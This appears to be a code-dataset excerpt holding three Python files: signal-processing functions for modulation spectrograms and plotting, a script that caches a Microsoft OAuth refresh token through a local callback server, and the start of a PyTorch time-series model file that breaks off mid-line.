np.pi * spectrogram_data['freq_axis'])\n A = 1. 
/ ((s**2) * np.pi) ** (1./4)\n\n\n x_tmp = np.real(spectrogram_data['wavelet_coefficients'])\n\n # compute the mean across scaled \"filtered\" signals\n for ix, a in enumerate(A):\n x_tmp[:, ix, :] = x_tmp[:, ix, :] / a \n \n x = np.mean(x_tmp, axis = 1) \n \n #x = squeeze(mean( bsxfun(@rdivide, real(spectrogram_data.wavelet_coefficients) , A ), 2));\n\n return x\n\ndef strfft_modulation_spectrogram(x, fs, win_size, win_shift, fft_factor_y=None, win_function_y='hamming', fft_factor_x=None, win_function_x='hamming', channel_names=None):\n \"\"\"Compute the Modulation Spectrogram using the Complex Morlet wavelet for one or a set of REAL signals 'x'.\n \n Parameters\n ----------\n x : 1D array with shape (n_samples) or\n 2D array with shape (n_samples, n_channels)\n fs : Sampling frequency \n in Hz\n win_size :\n Size of the sliding window for STFFF (samples)\n win_shift :\n Shift between consecutive windows (samples) \n fft_factor_y : Number of elements to perform the 1st FFT is given as:\n n_fft_y = fft_factor_y * n_samples, (default, fft_factor_y = 1)\n win_function_y : Window to apply in the 1st FFT \n (Default 'Hamming')\n fft_factor_x : Number of elements to perform the 2nd FFT is given as:\n n_fft_x = fft_factor_x * n_samples, (default, fft_factor_x = 1)\n win_function_x : Window to apply in the 2nd rFFT \n (Default 'Hamming') \n n_fft : Number of samples to compute the FFT\n (Default = n_samples in array x) \n channel_names : Names of the signals\n (Default Signal-XX with XX 1, 2, ... n_channels) \n\n Returns\n -------\n modulation_spectrogram_data : Dictionary with Modulation Spectrogram data, with the elements:\n rFFT_modulation_spectrogram\n rFFT values for each window (u), scaled by the Window RMS \n power_modulation_spectrogram :\n Power modulation spectrogram (u^2 / Hz) \n fs : \n Sampling frequency (Hz)\n fs_mod : \n Sampling frequency of modulation-frequency (Hz) \n freq_axis :\n Frequency axis for rFFT and PSD (Hz)\n freq_delta :\n Frequency axis step (Hz)\n freq_mod_axis :\n Modulation-frequency axis for rFFT_modspec and pwr_modspec (Hz) \n freq_mod_delta :\n Modulation-frequency step (Hz)\n win_size_samples :\n Size of the sliding window for STFFF (samples)\n win_shift_samples :\n Shift between consecutive windows (samples) \n n_fft_y :\n Number of elements utilized to perform the 1st FFT\n n_fft_x :\n Number of elements utilized to perform the 2nd FFT\n win_function_y :\n Window to apply in the 1st rFFT \n win_function_x :\n Window to apply in the 2nd rFFT \n n_windows :\n Number of ST windows\n n_samples :\n Number of samples of the signal or signals 'x'\n spectrogram_data : \n Dictionary with Spectrogram data\n channel_names :\n Names of channels\n \n \"\"\"\n # input 'x' as 2D matrix [samples, columns]\n try:\n x.shape[1]\n except IndexError:\n x = x[:, np.newaxis]\n \n # number of samples and number of channels\n n_samples, n_channels = x.shape\n \n # validate 'fft_factor_y' argument \n if fft_factor_y is None:\n fft_factor_y = 1\n \n # validate 'fft_factor_x' argument \n if fft_factor_x is None:\n fft_factor_x = 1\n \n # number of elements for the 1st FFT\n n_fft_y = fft_factor_y * win_size\n\n \n # compute STFFT spectrogram\n spectrogram_data = strfft_spectrogram(x, fs, win_size, win_shift, n_fft_y, win_function_y, channel_names)\n n_windows, n_freqs, n_channels = spectrogram_data['rFFT_spectrogram'].shape\n # Number of elements for the 2nd FFT\n n_fft_x = fft_factor_x * n_windows\n\n # generate default channel names, if needed\n if channel_names is None:\n 
channel_names = []\n for ic in range (0 , n_channels):\n icp = ic + 1\n channel_names.append( str('Signal-%02d' % icp) )\n \n # modulation sampling frequency\n fs_mod = 1 / (win_shift / fs)\n\n # the AM analysis is made in the Amplitude derived from the Power Spectrogram\n for i_channel in range(0, n_channels):\n # data to generate the Modulation Spectrogram\n spectrogram_1ch = np.sqrt(spectrogram_data['power_spectrogram'][:,:,i_channel]) \n\n # compute 'rfft_psd' on each frequency timeseries\n mod_psd_struct = rfft_psd(spectrogram_1ch, fs_mod, n_fft_x, win_function_x, channel_names )\n \n if i_channel == 0:\n # modulation frequency axis\n fmod_ax = mod_psd_struct['freq_axis']\n # modulation frequency delta\n fmod_delta = mod_psd_struct['freq_delta']\n \n # initialize 'rFFT_modspec' and 'pwr_modspec'\n n_freqsmod = len(fmod_ax)\n rFFT_modspec = np.zeros((n_freqs, n_freqsmod ,n_channels), dtype = complex)\n pwr_modspec = np.zeros((n_freqs, n_freqsmod ,n_channels))\n\n # rFFT data\n rFFT_modspec[:, :, i_channel] = mod_psd_struct['rFFT'].transpose()\n # power data\n pwr_modspec[:, :, i_channel] = mod_psd_struct['PSD'].transpose()\n\n # scale 'pwr_modspec' by modulation-frequency delta\n pwr_modspec = pwr_modspec / fmod_delta\n\n # output 'modulation_spectrogram_data' structure\n modulation_spectrogram_data = {}\n modulation_spectrogram_data['rFFT_modulation_spectrogram'] = rFFT_modspec\n modulation_spectrogram_data['power_modulation_spectrogram'] = pwr_modspec\n modulation_spectrogram_data['fs'] = fs\n modulation_spectrogram_data['fs_mod'] = fs_mod\n modulation_spectrogram_data['freq_axis'] = spectrogram_data['freq_axis']\n modulation_spectrogram_data['freq_delta'] = spectrogram_data['freq_delta']\n modulation_spectrogram_data['freq_mod_axis'] = fmod_ax\n modulation_spectrogram_data['freq_mod_delta'] = fmod_delta\n modulation_spectrogram_data['win_size_samples'] = win_size\n modulation_spectrogram_data['win_shift_samples'] = win_shift\n modulation_spectrogram_data['n_fft_y'] = n_fft_y\n modulation_spectrogram_data['n_fft_x'] = n_fft_x\n modulation_spectrogram_data['win_function_y'] = win_function_y\n modulation_spectrogram_data['win_function_x'] = win_function_x\n modulation_spectrogram_data['n_windows'] = n_windows \n modulation_spectrogram_data['n_samples'] = spectrogram_data['n_samples'] \n modulation_spectrogram_data['spectrogram_data'] = spectrogram_data\n modulation_spectrogram_data['channel_names'] = channel_names\n \n return modulation_spectrogram_data\n\ndef istrfft_modulation_spectrogram(modulation_spectrogram_data):\n \"\"\" Compute the inverse STFT-based modulation spectrogram for one or a set of REAL signals.\n \n Parameters\n ----------\n modulation_spectrogram_data : Structure with STFT-based modulation spectrogram data, \n created with strfft_modulation_spectrogram()\n \n Returns\n -------\n x : 1D array with shape (n_samples) or\n 2D array with shape (n_samples, n_channels)\n \n \"\"\"\n # Number of channels from Modspectrogram structure\n n_channels = modulation_spectrogram_data['rFFT_modulation_spectrogram'].shape[2]\n \n # Prepare psd_tmp_data to perform irFFT on Modulation Spectogram\n psd_tmp_data = {}\n psd_tmp_data['freq_axis'] = modulation_spectrogram_data['freq_mod_axis']\n psd_tmp_data['fs'] = modulation_spectrogram_data['fs_mod']\n psd_tmp_data['win_function'] = modulation_spectrogram_data['win_function_x']\n psd_tmp_data['n_samples'] = modulation_spectrogram_data['n_windows']\n\n\n for i_channel in range(n_channels):\n # Slide with the rFFT coeffients of the 2nd 
FFT \n psd_tmp_data['rFFT'] = np.transpose(modulation_spectrogram_data['rFFT_modulation_spectrogram'][:,:,i_channel]) \n # Recovers the Square Root of the Power Spectrogram\n sqrt_pwr_spectrogram = irfft_psd(psd_tmp_data)\n # Power Spectrogram\n pwr_spectrogram = sqrt_pwr_spectrogram ** 2\n # Scale Power Spectrogram by (n_windows * time_delta)\n pwr_spectrogram = pwr_spectrogram * modulation_spectrogram_data['spectrogram_data']['n_windows'] * modulation_spectrogram_data['spectrogram_data']['time_delta']\n # Scale Power Spectrogram by (freq_delta)\n pwr_spectrogram = pwr_spectrogram * modulation_spectrogram_data['spectrogram_data']['freq_delta']\n # Scale Power Spectrogram by the number of samples used\n pwr_spectrogram = pwr_spectrogram / (1 / modulation_spectrogram_data['spectrogram_data']['n_fft'] ** 2)\n # Divde by 2 all the elements except DC and the Nyquist point (in even case) \n pwr_spectrogram = pwr_spectrogram / 2\n pwr_spectrogram[:, 0] = pwr_spectrogram[:, 0] * 2\n if np.mod(modulation_spectrogram_data['spectrogram_data']['n_fft'], 2) == 0:\n # NFFT was even, then \n pwr_spectrogram[:, -1] = pwr_spectrogram[:, -1] * 2\n spectrogram_abs = np.sqrt(pwr_spectrogram)\n # Recovers the Angle values of the Spectrogram\n spectrogram_angle = np.angle(modulation_spectrogram_data['spectrogram_data']['rFFT_spectrogram'][:,:,i_channel])\n # Creates the rFFT coefficients of the 1st FFTs\n modulation_spectrogram_data['spectrogram_data']['rFFT_spectrogram'][:,:,i_channel] = spectrogram_abs * np.exp(1j * spectrogram_angle ) \n\n # Recovers the origial signal or set of signals\n x = istrfft_spectrogram(modulation_spectrogram_data['spectrogram_data'])[0]\n \n return x\n\ndef wavelet_modulation_spectrogram(x, fs, n_cycles=6, freq_vct=None, fft_factor_x=1, win_function_x='hamming', channel_names=None):\n \"\"\"Compute the Modulation Spectrogram using the Wavelet for one or a set of REAL signals 'x'.\n \n Parameters\n ----------\n x : 1D array with shape (n_samples) or\n 2D array with shape (n_samples, n_channels)\n fs : Sampling frequency \n in Hz\n n : Number of cicles inside the Gaussian curve \n (Default 6)\n freq_vct : 1D array \n with frequencies to compute the CWT (Default = [1 : 1 : fs/2] )\n fft_factor_x : Number of elements to perform the FFT is given as:\n n_fft_x = fft_factor_x * n_samples, (default, fft_factor_x = 1)\n win_function_x : Window to apply in the rFFT \n (Default 'Hamming') \n channel_names : Names of the signals\n (Default Signal-XX with XX 1, 2, ... 
n_channels) \n\n Returns\n -------\n modulation_spectrogram_data : Dictionary with Modulation Spectrogram data, with the elements:\n rFFT_modulation_spectrogram\n rFFT values for each window (u), scaled by the Window RMS \n power_modulation_spectrogram :\n Power modulation spectrogram (u^2 / Hz) \n fs : \n Sampling frequency (Hz)\n fs_mod : \n Sampling frequency of modulation-frequency (Hz) \n freq_axis :\n Frequency axis for rFFT and PSD (Hz)\n freq_delta :\n Frequency axis step (Hz)\n freq_mod_axis :\n Modulation-frequency axis for rFFT_modspec and pwr_modspec (Hz) \n freq_mod_delta :\n Modulation-frequency step (Hz)\n n_fft_x :\n Number of elements utilized to perform the FFT\n win_function_x :\n Window to apply in the 2nd rFFT \n n_samples :\n Number of samples of the signal or signals 'x'\n spectrogram_data : \n Dictionary with Spectrogram data\n channel_names :\n Names of channels\n \n \"\"\"\n # input 'x' as 2D matrix [samples, columns]\n try:\n x.shape[1]\n except IndexError:\n x = x[:, np.newaxis]\n \n # number of samples and number of channels\n n_samples, n_channels = x.shape \n \n # generate default channel names, if needed\n if channel_names is None:\n channel_names = []\n for ic in range (0 , n_channels):\n icp = ic + 1\n channel_names.append( str('Signal-%02d' % icp) )\n \n spectrogram_data = wavelet_spectrogram(x, fs, n_cycles, freq_vct, channel_names)\n n_windows, n_freqs, n_channels = spectrogram_data['wavelet_coefficients'].shape\n\n # number of elements for FFT of the spectrogram\n n_fft_x = fft_factor_x * n_windows \n\n fs_mod = fs\n\n # the AM analysis is made in the Amplitude derived from the Power Spectrogram\n for i_channel in range(0, n_channels):\n # data to generate the Modulation Spectrogram\n spectrogram_1ch = np.sqrt(spectrogram_data['power_spectrogram'][:, :, i_channel])\n # Compute rfft_psd on each frequency timeseries\n psd_dict = rfft_psd(spectrogram_1ch, fs, n_fft_x)\n \n rfft_result = psd_dict['rFFT']\n rfft_psd_res = psd_dict['PSD']\n \n if i_channel == 0:\n # modulation frequency axis\n fmod_ax = psd_dict['freq_axis']\n # modulation frequency delta\n fmod_delta = psd_dict['freq_delta']\n n_freqsmod = np.size(fmod_ax)\n # initialize 'rFFT_modspec' and 'pwr_modspec'\n rfft_modspec = np.zeros((n_freqs, n_freqsmod, n_channels), dtype = complex)\n pwr_modspec = np.zeros((n_freqs, n_freqsmod, n_channels))\n \n # rFFT data\n rfft_modspec[:, :, i_channel] = np.transpose(rfft_result) \n # power data\n pwr_modspec[:, :, i_channel] = np.transpose(rfft_psd_res)\n \n # scale 'pwr_modspec' by modulation-frequency delta \n pwr_modspec = pwr_modspec / fmod_delta\n\n # output 'modulation_spectrogram_data' dictionary\n modulation_spectrogram_data = {}\n modulation_spectrogram_data['rFFT_modulation_spectrogram'] = rfft_modspec\n modulation_spectrogram_data['power_modulation_spectrogram'] = pwr_modspec\n modulation_spectrogram_data['fs'] = fs\n modulation_spectrogram_data['fs_mod'] = fs_mod\n modulation_spectrogram_data['freq_axis'] = spectrogram_data['freq_axis']\n modulation_spectrogram_data['freq_delta'] = spectrogram_data['freq_delta']\n modulation_spectrogram_data['freq_mod_axis'] = fmod_ax\n modulation_spectrogram_data['freq_mod_delta'] = fmod_delta\n modulation_spectrogram_data['n_fft_x'] = n_fft_x\n modulation_spectrogram_data['win_function_x'] = win_function_x\n modulation_spectrogram_data['n_samples'] = spectrogram_data['n_samples'] \n modulation_spectrogram_data['spectrogram_data'] = spectrogram_data\n modulation_spectrogram_data['channel_names'] = 
channel_names\n \n return modulation_spectrogram_data\n\ndef iwavelet_modulation_spectrogram(modulation_spectrogram_data):\n \"\"\" Compute the inverse CWT-based modulation spectrogram for one or a set of REAL signals.\n \n Parameters\n ----------\n modulation_spectrogram_data : Structure with CWT-based modulation spectrogram data, \n created with wavelet_modulation_spectrogram()\n\n Returns\n -------\n x : 1D array with shape (n_samples) or\n 2D array with shape (n_samples, n_channels)\n\n \"\"\"\n # Number of channels from Modspectrogram structure\n n_channels = modulation_spectrogram_data['rFFT_modulation_spectrogram'].shape[2]\n \n # Prepare psd_tmp_data to perform irFFT on Modulation Spectogram\n psd_tmp_data = {}\n psd_tmp_data['freq_axis'] = modulation_spectrogram_data['freq_mod_axis']\n psd_tmp_data['fs'] = modulation_spectrogram_data['fs_mod']\n psd_tmp_data['win_function'] = modulation_spectrogram_data['win_function_x']\n psd_tmp_data['n_samples'] = modulation_spectrogram_data['n_samples']\n \n \n for i_channel in range(n_channels):\n # Slide with the rFFT coeffients of the 2nd FFT \n psd_tmp_data['rFFT'] = np.transpose(modulation_spectrogram_data['rFFT_modulation_spectrogram'][:,:,i_channel]) \n # Recovers the Square Root of the Power Spectrogram\n sqrt_pwr_spectrogram = irfft_psd(psd_tmp_data)\n \n # Recovers the Magnitude of the Wavelet Coefficents\n pwr_spectrogram = sqrt_pwr_spectrogram ** 2\n pwr_spectrogram = pwr_spectrogram * modulation_spectrogram_data['fs_mod'] * modulation_spectrogram_data['n_samples']\n pwr_spectrogram = pwr_spectrogram / 2\n spectrogram_abs = np.sqrt(pwr_spectrogram)\n \n # Recovers the Angle values of the Spectrogram\n spectrogram_angle = np.angle(modulation_spectrogram_data['spectrogram_data']['wavelet_coefficients'][:,:,i_channel])\n \n # Creates the rFFT coefficients of the 1st FFTs\n modulation_spectrogram_data['spectrogram_data']['wavelet_coefficients'][:,:,i_channel] = spectrogram_abs * np.exp(1j * spectrogram_angle ) \n \n # Recovers the origial signal or set of signals\n x = iwavelet_spectrogram(modulation_spectrogram_data['spectrogram_data'])\n\n return x\n\ndef plot_spectrogram_data(spectrogram_data, ix=None, t_range=None, f_range=None, c_range=None, c_map='viridis'):\n \"\"\" Plot the Power Spectrogram related to the `spectrogram_data`\n \n Parameters\n ----------\n spectrogram_data : \n Dictionary with Spectrogram data\n ix : Index of the signal (channel) to plot\n (Default, all the channels, a new figure for each)\n t_range : Time range\n (Default [minimum time, maximum time])\n f_range : Frequency range\n (Default [minimum frequency, maximum frequency])\n c_range : Color (power) range\n (Default [mean power, maximum power])\n c_map : Colot Map\n (Default viridis)\n \n Returns\n -------\n If only a plot is requested, it is plotted in the existen axes (created if needed)\n If many plots are requested, a new figure is created for each plot\n \n \"\"\" \n \n def plot_one_spectrogram(ax, X_pwr, t_ax, f_ax, title_str, t_range, f_range, c_range, c_map):\n \"\"\"\n Plots ONLY ONE Spectrogram\n \"\"\"\n T, F = np.meshgrid(t_ax, f_ax) \n X_plot = 10 * np.log10(X_pwr[:,:].transpose() + np.finfo(float).eps) \n pmesh = plt.pcolormesh(T,F,X_plot, cmap=c_map)\n \n # Major and Minor ticks\n ax = plt.gca()\n ax.xaxis.set_major_locator(ticker.AutoLocator())\n ax.xaxis.set_minor_locator(ticker.AutoMinorLocator())\n ax.yaxis.set_major_locator(ticker.AutoLocator())\n ax.yaxis.set_minor_locator(ticker.AutoMinorLocator())\n \n plt.xlabel('fime (s)')\n 
plt.ylabel('frequency (Hz)')\n \n \n if t_range is not None:\n xlim = t_range\n else:\n xlim = t_ax\n \n if f_range is not None:\n ylim = f_range\n else:\n ylim = f_ax\n \n # set the limits of the plot to the limits of the data\n plt.axis([xlim.min(), xlim.max(), ylim.min(), ylim.max()])\n \n if c_range is not None:\n clim = c_range\n else:\n clim = np.array([np.mean(X_plot), np.amax(X_plot)]) \n \n pmesh.set_clim(vmin=clim[0], vmax=clim[1])\n \n plt.colorbar()\n plt.title(title_str)\n plt.draw()\n\n \n # validate 'ix' argument \n if ix is None:\n ix = range(0, spectrogram_data['power_spectrogram'].shape[2])\n elif np.isscalar(ix):\n ix = np.array([ix])\n \n # Check if ix has ONLY one element\n if len(ix) == 1:\n new_figure = False\n # Retrieve Current Axes handle from the Current Figure, if there is not\n # Current Figure, it's generated here \n ax = plt.gca()\n else:\n new_figure = True\n\n for i_channel in ix: \n if new_figure:\n plt.figure()\n ax = plt.gca()\n plot_one_spectrogram(ax, \n spectrogram_data['power_spectrogram'][:, :, i_channel], \n spectrogram_data['time_axis'], \n spectrogram_data['freq_axis'], \n spectrogram_data['channel_names'][i_channel],\n t_range, f_range, c_range, c_map) \n \n\n\ndef plot_modulation_spectrogram_data(modulation_spectrogram_data, ix=None, f_range=None, modf_range=None, c_range=None, c_map='viridis'):\n \"\"\" Plot the Power Modulation Spectrogram related to the `modulation_spectrogram_data`\n \n Parameters\n ----------\n modulation_spectrogram_data : \n Dictionary with Modulation Spectrogram data\n ix : Index of the signal (channel) to plot\n (Default, all the channels, a new figure for each)\n f_range : Frequency range\n (Default [minimum frequency, maximum frequency])\n fm_range : Modulation frequency range\n (Default [minimum mod_frequency, maximum mod_frequency])\n c_range : Color (power) range\n (Default [mean power, maximum power])\n c_map : Colot Map\n (Default viridis)\n \n Returns\n -------\n If only a plot is requested, it is plotted in the existen axes (created if needed)\n If many plots are requested, a new figure is created for each plot\n \n \"\"\" \n \n def plot_one_modulation_spectrogram(ax, X_pwr, f_ax, modf_ax, title_str, f_range, modf_range, c_range, c_map):\n \"\"\"\n Plots ONLY ONE Modulation Spectrogram\n \"\"\"\n MF, F = np.meshgrid(modf_ax, f_ax) \n X_plot = 10 * np.log10(X_pwr[:,:] + np.finfo(float).eps) \n pmesh = plt.pcolormesh(MF, F, X_plot, cmap =c_map)\n \n # Major and Minor ticks\n ax = plt.gca()\n ax.xaxis.set_major_locator(ticker.AutoLocator())\n ax.xaxis.set_minor_locator(ticker.AutoMinorLocator())\n ax.yaxis.set_major_locator(ticker.AutoLocator())\n ax.yaxis.set_minor_locator(ticker.AutoMinorLocator())\n \n plt.xlabel('modulation frequency (Hz)')\n plt.ylabel('conventional frequency (Hz)')\n \n \n if modf_range is not None:\n xlim = modf_range\n else:\n xlim = modf_ax\n \n if f_range is not None:\n ylim = f_range\n else:\n ylim = f_ax\n \n # set the limits of the plot to the limits of the data\n plt.axis([xlim.min(), xlim.max(), ylim.min(), ylim.max()])\n \n if c_range is not None:\n clim = c_range\n else:\n clim = np.array([np.mean(X_plot), np.amax(X_plot)]) \n \n pmesh.set_clim(vmin=clim[0], vmax=clim[1])\n \n plt.colorbar()\n plt.title(title_str)\n plt.draw()\n \n # validate 'ix' argument \n if ix is None:\n ix = range(0, modulation_spectrogram_data['power_modulation_spectrogram'].shape[2])\n elif np.isscalar(ix):\n ix = np.array([ix])\n \n # Check if ix has ONLY one element\n if len(ix) == 1:\n new_figure = 
False\n # Retrieve Current Axes handle from the Current Figure, if there is not\n # Current Figure, it's generated here \n ax = plt.gca()\n else:\n new_figure = True\n\n for i_channel in ix: \n if new_figure:\n plt.figure()\n ax = plt.gca()\n plot_one_modulation_spectrogram(ax, \n modulation_spectrogram_data['power_modulation_spectrogram'][:, :, i_channel], \n modulation_spectrogram_data['freq_axis'], \n modulation_spectrogram_data['freq_mod_axis'], \n modulation_spectrogram_data['channel_names'][i_channel],\n f_range, modf_range, c_range, c_map) \n\n\ndef plot_psd_data(psd_data, ix=None, p_range=None, f_range=None):\n \"\"\" Plot the PSD related to the `psd_data`\n \n Parameters\n ----------\n psd_data : \n Dictionary with PSD data\n ix : Index of the signal (channel) to plot\n (Default, all the channels, a new figure for each)\n p_range : Power range\n (Default [minimum power, maximum power])\n f_range : Frequency range\n (Default [minimum frequency, maximum frequency])\n \n Returns\n -------\n If only a plot is requested, it is plotted in the existen axes (created if needed)\n If many plots are requested, a new figure is created for each plot\n \n \"\"\" \n \n def plot_one_psd(ax, X_pwr, f_ax, title_str, p_range, f_range):\n \"\"\"\n Plots ONLY ONE PSD\n \"\"\" \n X_plot = 10 * np.log10(X_pwr + np.finfo(float).eps) \n plt.plot(f_ax, X_plot)\n \n # Major and Minor ticks\n ax = plt.gca()\n ax.xaxis.set_major_locator(ticker.AutoLocator())\n ax.xaxis.set_minor_locator(ticker.AutoMinorLocator())\n ax.yaxis.set_major_locator(ticker.AutoLocator())\n ax.yaxis.set_minor_locator(ticker.AutoMinorLocator())\n \n plt.xlabel('frequency (Hz)')\n plt.ylabel('power (dB/Hz)')\n \n \n if f_range is not None:\n xlim = f_range\n else:\n xlim = f_ax\n \n if p_range is not None:\n ylim = p_range\n else:\n ylim = X_plot\n \n # set the limits of the plot to the limits of the data\n plt.axis([xlim.min(), xlim.max(), ylim.min(), ylim.max()])\n \n plt.title(title_str)\n plt.draw()\n \n # validate 'ix' argument \n if ix is None:\n ix = range(0, psd_data['PSD'].shape[1])\n elif np.isscalar(ix):\n ix = np.array([ix])\n \n # Check if ix has ONLY one element\n if len(ix) == 1:\n new_figure = False\n # Retrieve Current Axes handle from the Current Figure, if there is not\n # Current Figure, it's generated here \n ax = plt.gca()\n else:\n new_figure = True\n\n for i_channel in ix: \n if new_figure:\n plt.figure()\n ax = plt.gca()\n plot_one_psd(ax, \n psd_data['PSD'][:, i_channel], \n psd_data['freq_axis'], \n psd_data['channel_names'][i_channel],\n p_range, f_range) \n\n\ndef plot_signal(x, fs, name=None):\n \"\"\"Behaves as matplotlib.pyplot.plot(x) but X axis is definded by `fs` [Hz]\n \n Parameters\n ----------\n x : \n 1D or 2D Signals as column vectors \n fs :\n Sampling frequency in Hz\n name :\n Name of the signal (Default 'Signal-01')\n \"\"\"\n \n # Create time vector\n time_vector = np.arange(x.shape[0])/fs\n \n plt.plot(time_vector,x)\n plt.xlabel('time (s)')\n plt.xlim([time_vector.min(), time_vector.max()])\n \n if name is None:\n name = 'Signal-01'\n \n plt.title(name)\n plt.draw()\n\nif __name__ == '__main__':\n \n # Example data\n fs = 256\n t_5s = np.arange(20*fs)/fs\n freqs = np.arange(1,101)\n x = np.asarray([np.sin(8*2*np.pi*t_5s), np.sin(25*2*np.pi*t_5s)])\n \n x = np.transpose(x)\n # x is composed by two signals:\n # 1) a 8 Hz sine wave\n # 2) a 25 hz sine wave \n \n # Compute modulation spectrogram with CWT \n w = wavelet_modulation_spectrogram(x, fs)\n \n # Compute modulation spectrogram with 
STFT\n f = strfft_modulation_spectrogram(x, fs, 1*fs, 0.5*fs)\n \n plot_modulation_spectrogram_data(w)\n plot_spectrogram_data(w['spectrogram_data'])\n \n plot_modulation_spectrogram_data(f, c_map='jet')\n plot_spectrogram_data(f['spectrogram_data'], c_map='jet') \n","repo_name":"MuSAELab/amplitude-modulation-analysis-module","sub_path":"am_analysis/am_analysis.py","file_name":"am_analysis.py","file_ext":"py","file_size_in_byte":55401,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"45"} +{"seq_id":"12697675381","text":"#!/usr/bin/env python\n# if we don't have a refresh token cached on disk, go get one.\n# spin up a simple Web server that will listen for auth code, then exchange that for a token and cache it locally in a file.\nimport ssl\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nimport json, requests\n\nconfig_file = \"config.json\"\nif config_file:\n with open(config_file, \"r\") as f:\n config_data = f.read()\n config = json.loads(config_data)\nelse:\n raise ValueError(\"Please provide config.json file with account information.\")\n\nclient_id = config[\"client_id\"] # Multi-tenant DriveReader App\nredirect_uri = config[\"redirect_uri\"]\nscopes = config[\"scopes\"]\n\n\ndef getAuthzToken(client_id, code, redirect_uri, scopes, is_msa_account):\n headers = {\"Content-Type\": \"application/x-www-form-urlencoded\"}\n params = {\n # Request parameters\n }\n url = f\"https://login.microsoftonline.com/common/oauth2/v2.0/token\"\n data = {\n \"client_id\": f\"{client_id}\",\n \"scope\": f\"{scopes}\",\n \"code\": f\"{code}\",\n \"redirect_uri\": f\"{redirect_uri}\",\n \"grant_type\": \"authorization_code\",\n }\n if is_msa_account == True:\n url = \"https://login.live.com/oauth20_token.srf\"\n req = requests.post(url, params=params, data=data, headers=headers)\n content = json.loads(req.content)\n refresh_token = content[\"refresh_token\"]\n return refresh_token\n\n\n# TODO: spinning up a web server might be overkill. Consider doing something simpler like straight up socket connection.\nclass HTTPServer_RequestHandler(BaseHTTPRequestHandler):\n # GET\n def do_GET(self):\n is_msa_account = False\n # Send response status code\n self.send_response(200)\n # Send headers\n self.send_header(\"Content-type\", \"text/html\")\n self.end_headers()\n x = str.split(self.path, \"=\")\n print(f\"\\nGet string: split on '=': {x}\")\n if len(x) >= 2:\n raw_code = x[1]\n if len(x) == 2:\n code = raw_code\n else:\n code = raw_code.split(\"&\")[0]\n print(code)\n try:\n if len(code.split(\".\")[2]) == 37:\n is_msa_account = True\n except Exception as e:\n print(e)\n pass\n refresh_token = getAuthzToken(\n client_id, code, redirect_uri, scopes, is_msa_account\n )\n with open(\"refresh.txt\", \"w\") as token_file:\n token_file.write(refresh_token)\n self.wfile.write(\n bytes(\n \"Cached refresh token locally. 
You can close this window and shutdown the server script.\",\n \"utf8\",\n )\n )\n return\n\n\ndef run():\n import webbrowser\n\n print(\"starting server...\")\n\n server_address = (\"127.0.0.1\", 8076)\n httpd = HTTPServer(server_address, HTTPServer_RequestHandler)\n\n print(\"running server...\")\n\n httpd.serve_forever()\n\n\nimport webbrowser\n\nauth_site = f\"https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id={client_id}&redirect_uri={redirect_uri}&response_type=code&scope={scopes}\"\n# Open url in a new window of the default browser, if possible\nwebbrowser.open_new(auth_site)\n\nrun()\n","repo_name":"rtreit/christmas-namedraw","sub_path":"cache_refresh_token.py","file_name":"cache_refresh_token.py","file_ext":"py","file_size_in_byte":3311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"74136019975","text":"import torch.nn as nn\r\nimport torch\r\nfrom torch.nn import TransformerEncoderLayer\r\nfrom Attention.attention import Attention\r\n\r\n# from transformers import GPT2LMHeadModel, GPT2Tokenizer\r\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\r\n\r\n\r\nclass Model(nn.Module):\r\n\r\n def __init__(self, model, data, hidden_size, num_layers):\r\n super().__init__()\r\n self.model = model\r\n # batch_size, length, input_dim = data.shape[0], data.shape[1], data.shape[2] # batch_size代表数据总长度\r\n batch_size, length, input_dim = data.shape[0], data.shape[1], 1 # batch_size代表数据总长度\r\n self.batch_size, self.length, self.input_dim = batch_size, length, input_dim\r\n # LSTM\r\n self.lstm = nn.LSTM(input_dim, hidden_size, num_layers, batch_first=True).to(device)\r\n self.lstm_mlp = nn.Sequential(\r\n nn.Linear((length - 1) * hidden_size, hidden_size),\r\n nn.ReLU(),\r\n nn.Linear(hidden_size, 1),\r\n ).to(device)\r\n self.lstm_linear = nn.Linear(hidden_size, 1).to(device)\r\n # GRU\r\n self.gru = nn.GRU(input_dim, hidden_size, num_layers, batch_first=True).to(device)\r\n self.gru_linear = nn.Linear(hidden_size, 1).to(device)\r\n self.gru_c1 = nn.Sequential(\r\n nn.Linear((length - 1) * hidden_size, hidden_size),\r\n # nn.Sigmoid(),\r\n nn.ReLU(),\r\n nn.Linear(hidden_size, hidden_size)\r\n ).to(device)\r\n self.gru_c2 = nn.Sequential(\r\n nn.Linear(hidden_size, hidden_size),\r\n nn.ReLU(),\r\n nn.Linear(hidden_size, 1)\r\n ).to(device)\r\n # self.gru_c1 = nn.Linear((length - 1) * hidden_size, hidden_size)\r\n # self.gru_c2 = nn.ReLU()\r\n # self.gru_c3 = nn.Linear(hidden_size, 1)\r\n\r\n # BiLSTM\r\n self.bilstm = nn.LSTM(input_dim, hidden_size, num_layers, batch_first=True, bidirectional=True).to(device)\r\n self.bilstm_linear = nn.Linear(hidden_size * 2, length).to(device)\r\n self.bilstm_mlp = nn.Sequential(\r\n nn.Linear((length - 1) * hidden_size * 2, hidden_size),\r\n nn.ReLU(),\r\n nn.Linear(hidden_size, 1),\r\n ).to(device)\r\n # seq2seq\r\n self.encoder = nn.LSTM(input_dim, hidden_size, num_layers=1, batch_first=True).to(device)\r\n self.decoder = nn.LSTM(input_dim, hidden_size, num_layers=1, batch_first=True).to(device)\r\n self.S2S_mlp = nn.Linear(hidden_size, 1).to(device)\r\n\r\n # Transformer\r\n self.transformer_layer = TransformerEncoderLayer(input_dim, nhead=1, dim_feedforward=256, dropout=0.1).to(\r\n device)\r\n self.transformer_linear = nn.Linear(input_dim, 1).to(device)\r\n self.transformer_mlp = nn.Sequential(nn.Linear((length - 1) * input_dim, input_dim),\r\n nn.ReLU(),\r\n nn.Linear(input_dim, 1)\r\n ).to(device)\r\n # att\r\n self.linear_layers = 
